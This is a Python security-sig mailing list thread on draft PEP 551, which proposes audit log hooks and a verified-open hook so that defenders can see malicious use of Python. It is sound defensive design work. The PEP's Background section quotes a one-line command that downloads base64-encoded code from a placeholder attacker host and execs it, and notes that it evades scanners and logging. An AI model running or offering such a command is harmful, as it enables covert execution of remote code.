From njs at pobox.com  Thu Aug 24 14:16:44 2017
From: njs at pobox.com (Nathaniel Smith)
Date: Thu, 24 Aug 2017 11:16:44 -0700
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
Message-ID: <CAPJVwB=UP-Ukaj7H5Csk2WfwzNu4HdcV6XaKhY09C=CY40N-Xg@mail.gmail.com>

I don't have any particular security expertise, but a few thoughts anyway...

- your big list of logged events seems to be missing
getaddrinfo/getnameinfo (the modern replacements for get*by*)

- you make it possible for arbitrary code to log arbitrary events by
calling sys.loghook, which seems useful if you want to allow e.g. cffi to
log similar events to the ones that ctypes logs. But are you worried that
attackers could use the ability to forge arbitrary events to cover their
trail?

- the name "spython" makes me nervous, because I feel like as soon as
discussion switches from specifics like "transparency through event
logging" to vague abstractions like "secure", then it becomes much more
difficult to have useful discussions. Like, we're inevitably going to have
people trying to use 'spython' to replace their normal python 'because it's
more secure' and stuff like that. Would it make sense to call it something
else, like 'tpython' (for 'transparent'), or 'stdemo-python' (to emphasize
that it's more intended as an example and starting point rather than a
useful product)?

-n

From barry at python.org  Thu Aug 24 14:46:55 2017
From: barry at python.org (Barry Warsaw)
Date: Thu, 24 Aug 2017 14:46:55 -0400
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <CAPJVwB=UP-Ukaj7H5Csk2WfwzNu4HdcV6XaKhY09C=CY40N-Xg@mail.gmail.com>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
 <CAPJVwB=UP-Ukaj7H5Csk2WfwzNu4HdcV6XaKhY09C=CY40N-Xg@mail.gmail.com>
Message-ID: <DEC9E356-6576-4E8F-A28F-9FB874252DEB@python.org>

On Aug 24, 2017, at 14:16, Nathaniel Smith <njs at pobox.com> wrote:
> 
> - the name "spython" makes me nervous, because I feel like as soon as discussion switches from specifics like "transparency through event logging" to vague abstractions like "secure", then it becomes much more difficult to have useful discussions. Like, we're inevitably going to have people trying to use 'spython' to replace their normal python 'because it's more secure' and stuff like that. Would it make sense to call it something else, like 'tpython' (for 'transparent'), or 'stdemo-python' (to emphasize that it's more intended as an example and starting point rather than a useful product)?

It makes me a little uncomfortable too because there have been several discussions over the years amongst Linux distros about an `spython` meaning "system Python".  Essentially that would be an entry point that you couldn't install stuff into, and thus couldn't accidentally break your distro (for those Linux distros that have vital functionality implemented in Python).

We could certainly bikeshed on this, but ultimately I think we'll want to make the actual entry point name emitted from the build process to be configurable.

-Barry


From steve.dower at python.org  Thu Aug 24 14:52:29 2017
From: steve.dower at python.org (Steve Dower)
Date: Thu, 24 Aug 2017 11:52:29 -0700
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <CAPJVwB=UP-Ukaj7H5Csk2WfwzNu4HdcV6XaKhY09C=CY40N-Xg@mail.gmail.com>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
 <CAPJVwB=UP-Ukaj7H5Csk2WfwzNu4HdcV6XaKhY09C=CY40N-Xg@mail.gmail.com>
Message-ID: <4deb1b45-69dd-a0f3-a41a-555dbbd442dd@python.org>

On 24Aug2017 1116, Nathaniel Smith wrote:
> I don't have any particular security expertise, but a few thoughts anyway...

Glad to hear them!

> - your big list of logged events seems to be missing
> getaddrinfo/getnameinfo (the modern replacements for get*by*)

Indeed, added! They'll be in the next update.

> - you make it possible for arbitrary code to log arbitrary events by
> calling sys.loghook, which seems useful if you want to allow e.g. cffi
> to log similar events to the ones that ctypes logs. But are you worried
> that attackers could use the ability to forge arbitrary events to cover
> their trail?

I raised this question with some of our defenders and they don't think 
it's a serious concern, especially since an attacker could "forge" real 
events by taking the action and ignoring the result.

For example, a lot of malware will use DNS resolution as a kill-switch. 
When a name stops resolving (or when it starts resolving), it wipes 
itself. The attacker could attempt to DoS the log analysis by resolving 
hundreds of randomly generated names, thereby letting defenders know 
that *something* is going on, but making it really hard to figure out 
exactly what is going on.

It's thought unlikely that malicious code would reduce the number of 
events compared to normal operation, so any increase - real or forged - 
is an indication of a problem. About the only valid use case I can come 
up with for forging events is when an attacker suppresses all events but 
wants things to continue to look normal, and it's much easier to do this by:

* infect normal running process and suppress all events
* spawn undetected subprocess and suppress all its events
* crash the original process and let the host restart it automatically 
(very likely on a running server)
* do all your work in the subprocess that nobody expects to see messages 
from anyway

Basically, when weighed against the ability for libraries like cffi and 
pywin32 to add their own contributions to the log, it is worth the risk 
to allow extra messages.
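The argument above rests on event volume: an attacker can add noise, real or forged, but rarely reduces the number of events compared to normal operation. A minimal sketch of analysis that relies on this, assuming events have already been collected as (name, args) pairs and that a per-name baseline of normal counts is available; `flag_increases()`, the event names and the `factor` threshold are all hypothetical.

```python
from collections import Counter


def flag_increases(baseline, observed_events, factor=2.0):
    """Return {event name: count} for events well above their baseline.

    baseline maps an event name to its typical count over the same window.
    observed_events is an iterable of (name, args) pairs.
    Names that never appear in the baseline are always flagged.
    """
    counts = Counter(name for name, _args in observed_events)
    flagged = {}
    for name, count in counts.items():
        expected = baseline.get(name, 0)
        if expected == 0 or count > factor * expected:
            flagged[name] = count
    return flagged


# Hypothetical event names: hundreds of DNS lookups stand out, compiles do not.
baseline = {"socket.getaddrinfo": 10, "compile": 50}
events = [("socket.getaddrinfo", ("example.com",))] * 300
events += [("compile", ("<string>",))] * 40
print(flag_increases(baseline, events))  # {'socket.getaddrinfo': 300}
```

Forged events only add to the counts, so they make an intrusion noisier rather than quieter under this kind of check.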

(And let me know if you think this explanation is important to have in 
the PEP text somewhere.)

> - the name "spython" makes me nervous, because I feel like as soon as
> discussion switches from specifics like "transparency through event
> logging" to vague abstractions like "secure", then it becomes much more
> difficult to have useful discussions. Like, we're inevitably going to
> have people trying to use 'spython' to replace their normal python
> 'because it's more secure' and stuff like that. Would it make sense to
> call it something else, like 'tpython' (for 'transparent'), or
> 'stdemo-python' (to emphasize that it's more intended as an example and
> starting point rather than a useful product)?

Who said "secure"? :) Given the lack of command-line arguments and 
interactive mode, "stupid" is the more likely interpretation of the 's' 
(though I also liked the suggestion that it's for "spy-thon", since we 
can spy on what it's doing).

The most likely true meaning is "system" - many of the people involved 
in the Linux distros have been talking about having a separate system 
Python for their tools that is not exposed to users, and part of the 
intent of this entry point is to fulfill that need. Whether it will or 
not is an open question, but I'm keen to adapt this part of the PEP to 
be most useful to distributors, since the point of it is to be the 
starting point of the exact entry point they need. (And also to be able 
to test some of the features in the test suite.)

Cheers,
Steve


From steve.dower at python.org  Thu Aug 24 16:01:56 2017
From: steve.dower at python.org (Steve Dower)
Date: Thu, 24 Aug 2017 13:01:56 -0700
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <A1E65B87-2C1C-47D1-8BEC-C51B6E7A46D1@dontusethiscode.com>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
 <CAPJVwB=UP-Ukaj7H5Csk2WfwzNu4HdcV6XaKhY09C=CY40N-Xg@mail.gmail.com>
 <4deb1b45-69dd-a0f3-a41a-555dbbd442dd@python.org>
 <A1E65B87-2C1C-47D1-8BEC-C51B6E7A46D1@dontusethiscode.com>
Message-ID: <ff24b811-192e-a53f-1b31-2e511df2da58@python.org>

On 24Aug2017 1241, James Powell wrote:
>
>>> Like, we're inevitably going to
>>> have people trying to use 'spython' to replace their normal python
>>> 'because it's more secure' and stuff like that. Would it make sense to
>>> call it something else, like 'tpython' (for 'transparent'), or
>>> 'stdemo-python' (to emphasize that it's more intended as an example and
>>> starting point rather than a useful product)?
>
> This is an important point. It's going to be critical that we appropriately convey what "security transparency" means. I believe we can do this.
>
> Many of the convenience features (e.g., Windows-specific integrations like ETW) attached to this project should be made generally available. We should encourage users to deploy spython only where security transparency truly makes sense, and discourage its deployment where users just want access to some integration feature.
>
> (Note that it may not even make sense to deploy spython for work that requires ctypes or cffi or numpy or pywin32 or any other library that could allow raw memory access.)

Agreed. This is the point of the Recommendations section, and 
specifically the recommendation to not distribute any spython build 
outside of your own network (I explicitly said that python.org won't 
distribute builds, and it's up to any other distributors to make their 
own call).

If you build from source, you'll get spython, but currently I don't 
think it'll install from source (I certainly didn't change anything to 
make that work). That's the way I expect it to stay.

I think platform specific functionality should be kept separate, if only 
because testing and maintaining it is so much more difficult. Ideally 
security vendors will offer their own versions that organizations can 
build upon which integrate with their tools (and Microsoft certainly 
falls into this category for OS functionality like DeviceGuard and ETW), 
but I don't want our volunteers to have to worry about configuring test 
machines on their free time just to make sure it doesn't break (or to 
get caught up in liability disputes if someone relies on it when they 
really should have done due diligence).

Also, integration into things like the logging module (for ETW on 
Windows) is totally unrelated to this PEP. All it takes is someone to 
write the extension module and ship it on PyPI.


As an aside, one of Microsoft's top security guys saw a tweet about this 
and posted some screenshots of Python payloads in actual malware:

https://twitter.com/JohnLaTwC/statuses/900807173495771140

My favourite part is the Python 2.x and 3.x compatibility in the MacOS 
path of the first one :) (the Windows path in that one uses PowerShell).

Cheers,
Steve


From steve.dower at python.org  Thu Aug 24 16:12:23 2017
From: steve.dower at python.org (Steve Dower)
Date: Thu, 24 Aug 2017 13:12:23 -0700
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <ff24b811-192e-a53f-1b31-2e511df2da58@python.org>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
 <CAPJVwB=UP-Ukaj7H5Csk2WfwzNu4HdcV6XaKhY09C=CY40N-Xg@mail.gmail.com>
 <4deb1b45-69dd-a0f3-a41a-555dbbd442dd@python.org>
 <A1E65B87-2C1C-47D1-8BEC-C51B6E7A46D1@dontusethiscode.com>
 <ff24b811-192e-a53f-1b31-2e511df2da58@python.org>
Message-ID: <4a6786c2-f24f-d15b-cea3-32f6663cc1e6@python.org>

On 24Aug2017 1301, Steve Dower wrote:
> As an aside, one of Microsoft's top security guys saw a tweet about this
> and posted some screenshots of Python payloads in actual malware:
>
> https://twitter.com/JohnLaTwC/statuses/900807173495771140
>
> My favourite part is the Python 2.x and 3.x compatibility in the MacOS
> path of the first one :) (the Windows path in that one uses PowerShell).

Actually, looks like all the Python code in those is targeting macOS... 
the disadvantages of having Python pre-installed by default :)

Cheers,
Steve


From james at dontusethiscode.com  Thu Aug 24 15:41:24 2017
From: james at dontusethiscode.com (James Powell)
Date: Thu, 24 Aug 2017 15:41:24 -0400
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <4deb1b45-69dd-a0f3-a41a-555dbbd442dd@python.org>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
 <CAPJVwB=UP-Ukaj7H5Csk2WfwzNu4HdcV6XaKhY09C=CY40N-Xg@mail.gmail.com>
 <4deb1b45-69dd-a0f3-a41a-555dbbd442dd@python.org>
Message-ID: <A1E65B87-2C1C-47D1-8BEC-C51B6E7A46D1@dontusethiscode.com>


>> Like, we're inevitably going to
>> have people trying to use 'spython' to replace their normal python
>> 'because it's more secure' and stuff like that. Would it make sense to
>> call it something else, like 'tpython' (for 'transparent'), or
>> 'stdemo-python' (to emphasize that it's more intended as an example and
>> starting point rather than a useful product)?

This is an important point. It's going to be critical that we appropriately convey what "security transparency" means. I believe we can do this. 

Many of the convenience features (e.g., Windows-specific integrations like ETW) attached to this project should be made generally available. We should encourage users to deploy spython only where security transparency truly makes sense, and discourage its deployment where users just want access to some integration feature.

(Note that it may not even make sense to deploy spython for work that requires ctypes or cffi or numpy or pywin32 or any other library that could allow raw memory access.)

:j


From steve.dower at python.org  Thu Aug 24 22:23:34 2017
From: steve.dower at python.org (Steve Dower)
Date: Thu, 24 Aug 2017 19:23:34 -0700
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <CAP1=2W6Kmjfrkg49hkT8B--cZmO=Nd4W4cvjrrYL8NoJbGuxxw@mail.gmail.com>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
 <CAP1=2W6Kmjfrkg49hkT8B--cZmO=Nd4W4cvjrrYL8NoJbGuxxw@mail.gmail.com>
Message-ID: <E1dl4HZ-0007dO-Sb@se2-syd.hostedmail.net.au>

I think overriding get_data in the subclass for source loading is the right approach. Rejecting .pyc files in the hook is easy enough, but for anyone doing proper validation (with a certificate or access control) I'd expect pyc's to fail anyway.
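A minimal sketch of the subclass approach, assuming a SHA-256 allowlist is an acceptable stand-in for "proper validation": `get_data()` verifies `.py` sources, refuses `.pyc` files, and passes every other read through unchanged so data files keep working. `VerifyingSourceLoader`, `load_verified()` and the allowlist are hypothetical; `SourceFileLoader`, `get_data()`, `spec_from_file_location()` and `module_from_spec()` are the standard importlib APIs. Raising `OSError` for the bytecode path relies on `SourceLoader.get_code()` treating that as "no usable cache" and compiling the source instead.

```python
import hashlib
import importlib.machinery
import importlib.util


class VerifyingSourceLoader(importlib.machinery.SourceFileLoader):
    """Hypothetical loader: verify .py sources, ignore .pyc, pass other reads through."""

    def __init__(self, fullname, path, allowed_sha256):
        super().__init__(fullname, path)
        # Hex SHA-256 digests of source files that may be executed.
        self.allowed_sha256 = allowed_sha256

    def get_data(self, path):
        path = str(path)
        if path.endswith(".pyc"):
            # get_code() swallows OSError on the bytecode path and falls back
            # to reading (and therefore verifying) the source file.
            raise OSError("bytecode loading disabled")
        data = super().get_data(path)
        if path.endswith(".py"):
            digest = hashlib.sha256(data).hexdigest()
            if digest not in self.allowed_sha256:
                raise ImportError(f"unverified source: {path}")
        # Any other file (e.g. package data) is returned unchanged.
        return data


def load_verified(name, path, allowed_sha256):
    """Import a single module file through the verifying loader."""
    loader = VerifyingSourceLoader(name, path, allowed_sha256)
    spec = importlib.util.spec_from_file_location(name, path, loader=loader)
    module = importlib.util.module_from_spec(spec)
    loader.exec_module(module)
    return module
```

Because the bytecode path is always refused, a stale or planted `.pyc` next to an approved source cannot be used to skip the check.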

Top-posted from my Windows phone

From: Brett Cannon
Sent: Thursday, August 24, 2017 18:58
To: Steve Dower; security-sig at python.org
Cc: lee.holmes at microsoft.com; james at dontusethiscode.com
Subject: Re: PEP 551: Security transparency in the Python runtime

One point to make about the importlib changes: since the change is currently being made to importlib.abc.FileLoader.get_data(), the default case for reading a non-.py file should be to do nothing and allow the read to occur. Otherwise there will be issues with code that is using that method to read data files (which is a legit use-case). Otherwise we're going to need a new subclass of importlib.machinery.SourceFileLoader where we document that you can't use get_data() to read arbitrary bytes, or restructure get_code() to not use get_data(). Or we need a new API to flag when get_data() should do a verifying open().
There is also the issue of not reading .pyc files, which will either have to be addressed by coming up with a complementary flag to PYTHONDONTWRITEBYTECODE or once again a special subclass where get_code() ignores bytecode completely.

On Thu, 24 Aug 2017 at 13:14 Steve Dower <steve.dower at python.org> wrote:
Hi security-sig,

Those of you who were at the PyCon US language summit this year (or who
saw the coverage at https://lwn.net/Articles/723823/) may recall that I
talked briefly about the ways Python is used by attackers to gain and/or
retain access to systems on local networks.

This comes out of work we've been doing at Microsoft to balance the
flexibility of scripting languages with their usefulness to malicious
users. PowerShell in particular has had a lot of work done, and we've
been doing the same internally for Python. Things like transcripting
(log every piece of code when it is compiled) and signature validation
(prevent loading unsigned code).

This PEP is about upstreaming enough functionality to make it easier to
maintain these features - it is *not* intended to add specific security
features to the core release. The aim is to be able to use a standard
libpython3.7/python37.dll with a custom python3.7/python.exe that adds
those features (listed in the PEP).

Right now parts of the PEP are incomplete. In particular, the
Recommendations section is much shorter than I intend, the list of log
hook locations is also too short, and I have only done a preliminary
performance analysis. But it's time to get reviews of the overall
concept. I'd also like to take suggestions for more hook locations and
relevant recommendations, so feel free to throw them out there. In
particular, I'm not as up to date on best practices for non-Windows
platforms as the rest of the list, so feel free to correct or improve
those parts.

Because ReST+max 80 character width makes tables completely unreadable
in source, I suggest reading it at
https://github.com/python/peps/blob/master/pep-0551.rst but I've
included the full text below for quoting purposes.

My current implementation is available at
https://github.com/zooba/cpython/tree/sectrans and should work on both
Windows and Linux. I hope to take this to python-dev by next week and
spend the dev sprints getting the PEP to the point where it can be accepted.

==========================================================

PEP: 551
Title: Security transparency in the Python runtime
Version: $Revision$
Last-Modified: $Date$
Author: Steve Dower <steve.dower at python.org>
Status: Draft
Type: Standards Track
Content-Type: text/x-rst
Created: 23-Aug-2017
Python-Version: 3.7
Post-History:

Abstract
========

This PEP describes additions to the Python API and specific behaviors for the
CPython implementation that make actions taken by the Python runtime visible to
security and auditing tools. The goals in order of increasing importance are to
prevent malicious use of Python, to detect and report on malicious use, and most
importantly to detect attempts to bypass detection. Most of the responsibility
for implementation falls on users, who must customize and build Python for their
own environment.

We propose two small sets of public APIs to enable users to reliably build their
copy of Python without having to modify the core runtime, protecting future
maintainability. We also discuss recommendations for users to help them develop
and configure their copy of Python.

Background
==========

Software vulnerabilities are generally seen as bugs that enable remote or
elevated code execution. However, in our modern connected world, the more
dangerous vulnerabilities are those that enable advanced persistent threats
(APTs). APTs are achieved when an attacker is able to penetrate a network,
establish their software on one or more machines, and over time extract data or
intelligence. Some APTs may make themselves known by maliciously damaging data
(e.g., `WannaCrypt
<https://www.microsoft.com/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/WannaCrypt>`_)
or hardware (e.g., `Stuxnet
<https://www.microsoft.com/wdsi/threats/malware-encyclopedia-description?name=Win32/Stuxnet>`_).
Most attempt to hide their existence and avoid detection. APTs often use a
combination of traditional vulnerabilities, social engineering, phishing (or
spear-phishing), thorough network analysis, and an understanding of
misconfigured environments to establish themselves and do their work.

The first infected machines may not be the final target and may not require
special privileges. For example, an APT that is established as a
non-administrative user on a developer's machine may have the ability to spread
to production machines through normal deployment channels. It is common for APTs
to persist on as many machines as possible, with sheer weight of presence making
them difficult to remove completely.

Whether an attacker is seeking to cause direct harm or hide their tracks, the
biggest barrier to detection is a lack of insight. System administrators with
large networks rely on distributed logs to understand what their machines are
doing, but logs are often filtered to show only error conditions. APTs that are
attempting to avoid detection will rarely generate errors or abnormal events.
Reviewing normal operation logs involves a significant amount of effort, though
work is underway by a number of companies to enable automatic anomaly detection
within operational logs. The tools preferred by attackers are ones that are
already installed on the target machines, since log messages from these tools
are often expected and ignored in normal use.

At this point, we are not going to spend further time discussing the existence
of APTs or methods and mitigations that do not apply to this PEP. For further
information about the field, we recommend reading or watching the resources
listed under `Further Reading`_.

Python is a particularly interesting tool for attackers due to its prevalence on
server and developer machines, its ability to execute arbitrary code provided as
data (as opposed to native binaries), and its complete lack of internal logging.
This allows attackers to download, decrypt, and execute malicious code with a
single command::

    python -c "import urllib.request, base64;
    exec(base64.b64decode(urllib.request.urlopen('http://my-exploit/py.b64').read()).decode())"

This command currently bypasses most anti-malware scanners that rely on
recognizable code being read through a network connection or being written to
disk (base64 is often sufficient to bypass these checks). It also bypasses
protections such as file access control lists or permissions (no file access
occurs), approved application lists (assuming Python has been approved for other
uses), and automated auditing or logging (assuming Python is allowed to access
the internet or access another machine on the local network from which to obtain
its payload).

General consensus among the security community is that totally preventing
attacks is infeasible and defenders should assume that they will often detect
attacks only after they have succeeded. This is known as the "assume breach"
mindset. [1]_ In this scenario, protections such as sandboxing and input
validation have already failed, and the important task is detection, tracking,
and eventual removal of the malicious code. To this end, the primary feature
required from Python is security transparency: the ability to see what
operations the Python runtime is performing that may indicate anomalous or
malicious use. Preventing such use is valuable, but secondary to the need to
know that it is occurring.

To summarise the goals in order of increasing importance:

* preventing malicious use is valuable
* detecting malicious use is important
* detecting attempts to bypass detection is critical

One example of a scripting engine that has addressed these challenges is
PowerShell, which has recently been enhanced towards similar goals of
transparency and prevention. [2]_

Generally, application and system configuration will determine which events
within a scripting engine are worth logging. However, given that the value of
many log events is not recognized until after an attack is detected, it is
important to capture as much as possible and filter views rather than filtering
at the source (see the No Easy Breach video under `Further Reading`_). Events
that are always of interest include attempts to bypass event logging, attempts
to load and execute code that is not correctly signed or access-controlled, use
of uncommon operating system functionality such as debugging or inter-process
inspection tools, most network access and DNS resolution, and attempts to create
and hide files or configuration settings on the local machine.

To summarize, defenders have a need to audit specific uses of Python in order to
detect abnormal or malicious usage. Currently, the Python runtime does not
provide any ability to do this, which (anecdotally) has led to organizations
switching to other languages. The aim of this PEP is to enable system
administrators to deploy a security transparent copy of Python that can
integrate with their existing auditing and protection systems.

On Windows, some specific features that may be enabled by this include:

* Script Block Logging [3]_
* DeviceGuard [4]_
* AMSI [5]_
* Persistent Zone Identifiers [6]_
* Event tracing (which includes event forwarding) [7]_

On Linux, some specific features that may be integrated are:

* gnupg [8]_
* sd_journal [9]_
* OpenBSM [10]_
* syslog [11]_
* check execute bit on imported modules


On macOS, some features that may be used with the expanded APIs are:

* OpenBSM [10]_
* syslog [11]_

Overall, the ability to enable these platform-specific features on production
machines is highly appealing to system administrators and will make Python a
more trustworthy dependency for application developers.


Overview of Changes
===================

True security transparency is not fully achievable by Python in isolation. The
runtime can log as many events as it likes, but unless the logs are reviewed and
analyzed there is no value. Python may impose restrictions in the name of
security, but usability may suffer. Different platforms and environments will
require different implementations of certain security features, and
organizations with the resources to fully customize their runtime should be
encouraged to do so.

The aim of these changes is to enable system administrators to integrate Python
into their existing security systems, without dictating what those systems look
like or how they should behave. We propose two API changes to enable this: an
Event Log Hook and Verified Open Hook. Neither is set by default, and both
require modifying the appropriate entry point to enable any functionality. For
the purposes of validation and example, we propose a new spython/spython.exe
entry point program that enables some basic functionality using these hooks.
However, the expectation is that security-conscious organizations will create
their own entry points to meet their needs.

Event Log Hook
--------------

In order to achieve security transparency, an API is required to raise messages
from within certain operations. These operations are typically deep within the
Python runtime or standard library, such as dynamic code compilation, module
imports, DNS resolution, or use of certain modules such as ``ctypes``.

The new APIs required for log hooks are::

    # Add a logging hook
    sys.addloghook(hook: Callable[[str, tuple], None]) -> None
    int PySys_AddLogHook(int (*hook)(const char *event, PyObject *args));

    # Raise an event with all logging hooks
    sys.loghook(str, *args) -> None
    int PySys_LogHook(const char *event, PyObject *args);

    # Internal API used during Py_Finalize() - not publicly accessible
    void _Py_ClearLogHooks(void);

Hooks are added by calling ``PySys_AddLogHook()`` from C at any time, including
before ``Py_Initialize()``, or by calling ``sys.addloghook()`` from Python code.
Hooks are never removed or replaced, and existing hooks have an opportunity to
refuse to allow new hooks to be added (adding a logging hook is logged, and so
preexisting hooks can raise an exception to block the new addition).
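To make the ordering and veto rules concrete, here is a minimal pure-Python model of the behaviour described above. It is not the CPython implementation: `LogHookRegistry`, its methods and the ``"sys.addloghook"`` event name are hypothetical stand-ins for what a runtime would implement in C behind ``sys.addloghook()`` and ``sys.loghook()``.

```python
from typing import Callable, List

# A hook receives the event name and the tuple of arguments.
Hook = Callable[[str, tuple], None]


class LogHookRegistry:
    """Hypothetical model of the proposed log hook semantics."""

    def __init__(self) -> None:
        self._hooks: List[Hook] = []  # append-only: hooks are never removed

    def loghook(self, event: str, *args) -> None:
        # Fast path: with no hooks installed, raising an event costs very little.
        if not self._hooks:
            return
        # Hooks run in the order they were added. An exception from any hook
        # propagates to the caller, so later hooks are not called.
        for hook in list(self._hooks):
            hook(event, args)

    def addloghook(self, hook: Hook) -> None:
        # Adding a hook is itself an event, so existing hooks can veto the
        # addition by raising before the new hook is appended.
        self.loghook("sys.addloghook", hook)
        self._hooks.append(hook)


# Usage: a recording hook, then a hook that locks out further additions.
seen = []
reg = LogHookRegistry()
reg.addloghook(lambda event, args: seen.append(event))


def no_more_hooks(event, args):
    if event == "sys.addloghook":
        raise RuntimeError("hook installation is locked")


reg.addloghook(no_more_hooks)
reg.loghook("compile", "<string>")
try:
    reg.addloghook(lambda event, args: None)  # vetoed by no_more_hooks
except RuntimeError:
    pass
```

After this runs, `seen` holds the two ``"sys.addloghook"`` events and the ``"compile"`` event, and only two hooks are installed because the third addition was refused.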

When events of interest are occurring, code can either call ``PySys_LogHook()``
from C (while the GIL is held) or ``sys.loghook()``. The string argument is the
name of the event, and the tuple contains arguments. A given event name should
have a fixed schema for arguments, and both the event name and its argument
schema are considered a public API (for a given x.y version of Python), and
thus should only change between feature releases with updated documentation.

When an event is logged, each hook is called in the order it was added with the
event name and tuple. If any hook returns with an exception set, later hooks are
ignored and *in general* the Python runtime should terminate. This is
intentional to allow hook implementations to decide how to respond to any
particular event. The typical responses will be to log the event, abort the
operation with an exception, or to immediately terminate the process with an
operating system exit call.
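A hook covering the three typical responses might look like the sketch below. The event names, the ``BLOCKED_EVENTS``/``FATAL_EVENTS`` sets and the use of ``os._exit()`` for immediate termination are illustrative assumptions; the hook is a plain function so it can be exercised without any runtime support.

```python
import logging
import os

log = logging.getLogger("security.transparency")

# Hypothetical policy: events to refuse, and events treated as fatal.
BLOCKED_EVENTS = {"ctypes.dlopen"}
FATAL_EVENTS = {"hypothetical.tamper"}


def policy_hook(event: str, args: tuple) -> None:
    # 1. Log every event so it is available for later analysis.
    log.info("event=%s args=%r", event, args)
    # 2. Abort the operation: the exception propagates to the caller.
    if event in BLOCKED_EVENTS:
        raise PermissionError(f"{event} is not permitted")
    # 3. Terminate immediately; os._exit() skips finally blocks and
    #    atexit handlers, so no further Python code runs in this process.
    if event in FATAL_EVENTS:
        os._exit(1)
```

Which events fall into which set is a site policy decision; the hook API itself does not prescribe one.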

When an event is logged but no hooks have been set, the ``loghook()`` function
should have minimal overhead. Ideally, each argument is a reference to existing
data rather than a value calculated just for the logging call.

As hooks may be Python objects, they need to be freed during ``Py_Finalize()``.
To do this, we add an internal API ``_Py_ClearLogHooks()`` that releases any
``PyObject*`` hooks that are held, as well as any heap memory used. This is an
internal function with no public export, but it passes an event to all existing
hooks to ensure that unexpected calls are logged.

See `Log Hook Locations`_ for proposed log hook points and schemas, and the
`Recommendations`_ section for discussion on appropriate responses.

Verified Open Hook
------------------

Most operating systems have a mechanism to distinguish between files that can be
executed and those that cannot. For example, this may be an execute bit in the
permissions field, or a verified hash of the file contents to detect potential
code tampering. These are an important security mechanism for preventing
execution of data or code that is not approved for a given environment.
Currently, Python has no way to integrate with these when launching scripts or
importing modules.

The new public API for the verified open hook is::

    # Set the handler
    int Py_SetOpenForExecuteHandler(PyObject *(*handler)(const char *narrow, const wchar_t *wide));

    # Open a file using the handler
    os.open_for_exec(pathlike)

The ``os.open_for_exec()`` function is a drop-in replacement for
``open(pathlike, 'rb')``. Its default behaviour is to open a file for raw,
binary access - any more restrictive behaviour requires the use of a custom
handler. (Aside: since ``importlib`` requires access to this function before the
``os`` module has been imported, it will be available on the ``nt``/``posix``
modules, but the intent is that other users will access it through the ``os``
module.)
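The dispatch described above can be modelled in Python as follows. This is a sketch only: the real handler is a C function registered with ``Py_SetOpenForExecuteHandler()`` that receives the narrow or wide path, whereas ``set_open_for_exec_handler()`` and the module-level ``_handler`` here are hypothetical stand-ins taking a ``str`` path.

```python
import os
from typing import BinaryIO, Callable, Optional

Handler = Callable[[str], BinaryIO]
_handler: Optional[Handler] = None  # hypothetical: no handler by default


def set_open_for_exec_handler(handler: Handler) -> None:
    """Hypothetical stand-in for Py_SetOpenForExecuteHandler()."""
    global _handler
    _handler = handler


def open_for_exec(pathlike) -> BinaryIO:
    path = os.fspath(pathlike)
    if _handler is None:
        # Default behaviour: identical to open(pathlike, 'rb').
        return open(path, "rb")
    # With a handler set, its return value is passed back unchanged.
    return _handler(path)
```

Callers such as the import system only rely on getting back something that supports reading raw bytes, which is what lets a handler substitute an in-memory object.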

A custom handler may be set by calling ``Py_SetOpenForExecuteHandler()`` from C
at any time, including before ``Py_Initialize()``. When ``open_for_exec()`` is
called with a handler set, the handler will be passed the processed narrow or
wide path, depending on platform, and its return value will be returned
directly. The returned object should be an open file-like object that supports
reading raw bytes. This is explicitly intended to allow a ``BytesIO`` instance
if the open handler has already had to read the file into memory in order to
perform whatever verification is necessary to determine whether the content is
permitted to be executed.

Note that these handlers can import and call the ``_io.open()`` function on
CPython without triggering themselves.

If the handler determines that the file is not suitable for execution, it
should raise an exception of its choice, as well as performing any other
logging or notifications.
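
As an illustration of a handler that reads the whole file into memory,
verifies it, and then either returns a ``BytesIO`` or raises, the sketch
below compares a SHA-256 digest against an allow-list. The allow-list, the
``VerificationError`` class and the ``audit`` callback are assumptions made
for this example; a real deployment would more likely consult a platform
mechanism such as signature validation. The handler calls ``io.open``, which
on CPython is the same function as ``_io.open``.

```python
import hashlib
import io
from typing import Callable, Set


class VerificationError(PermissionError):
    """Hypothetical exception for files that are not approved."""


def make_hash_checking_handler(
    allowed_sha256: Set[str], audit: Callable[[str, bool], None]
) -> Callable[[str], io.BytesIO]:
    def handler(path: str) -> io.BytesIO:
        # Read the file once, so the bytes that were verified are exactly
        # the bytes handed back to the caller.
        with io.open(path, "rb") as f:
            data = f.read()
        allowed = hashlib.sha256(data).hexdigest() in allowed_sha256
        # Record the decision before acting on it.
        audit(path, allowed)
        if not allowed:
            raise VerificationError(path + " is not approved for execution")
        return io.BytesIO(data)

    return handler
```

Because the returned ``BytesIO`` holds the verified bytes, modifying the file
on disk after the check cannot change what the caller reads from it.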

All import and execution functionality involving code from a file will be
changed to use ``open_for_exec()`` unconditionally. It is important to note
that calls to ``compile()``, ``exec()`` and ``eval()`` do not go through this
function - a log hook that includes the code from these calls will be added
and is the best opportunity to validate code that is read from the file.
Given the current decoupling between import and execution in Python, most
imported code will go through both ``open_for_exec()`` and the log hook for
``compile``, and so care should be taken to avoid repeating verification
steps.
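
One way to avoid verifying the same code twice is to remember a digest of
the bytes approved by the open handler and let the ``compile`` hook skip
content it has already seen. In this sketch ``VerifiedCache`` and the
``verify`` callback are hypothetical, and it assumes that a ``str`` passed to
``compile`` is the UTF-8 decoding of the file; source in any other encoding
is simply verified a second time, which is safe but slower.

```python
import hashlib
from typing import Callable, Set, Union


class VerifiedCache:
    """Remembers digests of content that has already passed verification."""

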